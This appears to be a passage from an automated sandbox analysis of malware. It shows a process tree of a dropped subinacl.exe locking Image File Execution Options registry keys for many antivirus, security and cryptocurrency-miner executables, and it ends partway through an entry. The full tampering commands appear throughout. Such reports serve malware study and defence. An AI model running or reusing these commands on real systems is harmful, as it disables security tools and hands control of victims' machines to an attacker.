    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BaiduAnTray.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:1104
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BaiduHips.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:1708
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BaiduProtect.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3856
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bbservice.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3408
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcn.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3488
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2344
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDALeakfixer.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:1672
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDdaSvc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:804
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bddownloader.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4320
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDMiniDlUpdate.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3348
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdsafecenter.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:1600
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdwtxag.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4532
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bmc-cpu-32" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2204
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bmc-cpu.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:1964
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boost.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2168
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bootsvchost.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3100
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bot.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:1888
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brosec.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:5016
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BrowserManager.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:1004
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BrowserManagerGUI.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4396
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BrowserManagerShow.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2080
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brutb.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2316
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brute.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4372
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuard.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3472
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardBhvScanner.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2188
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardScanner.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4164
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3236
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BurstTCPClient.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4468
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BusinessMessaging.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:636
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BWMeter.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2572
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BWMeterConSvc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4036
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ByteFence.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3228
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cain.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2420
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cavwp.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4460
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cbService.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3672
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cbVSCService11.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:748
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2256
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3480
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CcmEventCollector.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1384
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccminer-x64.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:5020
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CcmService.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2152
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccsce.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4448
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4568
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cdhtr.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3400
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cefutil.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1604
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certsvc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1364
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cgminer.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3152
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chromodo_updater.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4148
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ciprotect.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4900
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CisTray.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2036
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamd.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:220
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ClamSentinel.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3740
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ClearLock.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4856
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Client Server Runtime Procces.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4952
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmdagent.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4232
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmdvirth.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3984
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CNTAoSMgr.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4672
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\command.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3680
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhostgui.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1524
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Conime.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2720
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\consctl.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1668
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\consctlx.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3172
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CpService.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3368
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer-aes-sse42.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3648
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer-sse42.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2324
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2044
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer_opt_AES.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3444
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer_opt_AVX2_AES.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2356
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer_opt_AVX_AES.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1848
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer_x64_SSE2.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4800
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cputest.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3068
- - C:\Windows\subinacl.exe
